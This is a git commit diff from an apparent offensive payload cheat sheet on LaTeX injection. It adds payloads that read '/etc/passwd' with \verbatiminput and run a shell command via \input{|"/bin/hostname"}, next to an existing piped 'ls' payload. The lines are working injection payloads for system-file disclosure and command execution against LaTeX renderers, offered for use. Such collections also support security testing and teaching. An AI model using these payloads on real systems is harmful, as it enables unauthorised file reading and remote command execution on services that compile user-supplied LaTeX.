LaTeX display code + XSS location alternative

This commit is contained in:
Swissky
2018-08-01 21:19:18 +02:00
parent dcc5ebd3b6
commit 644724396f
3 changed files with 17 additions and 0 deletions

View File

@@ -26,6 +26,13 @@ Read multiple lined file
\closein\file
```
Read text file, keep the formatting
```bash
\usepackage{verbatim}
\verbatiminput{/etc/passwd}
```
## Write file
```bash
\newwrite\outfile
@@ -48,6 +55,7 @@ If you get any LaTex error, consider using base64 to get the result without bad
```bash
\input|ls|base4
\input{|"/bin/hostname"}
```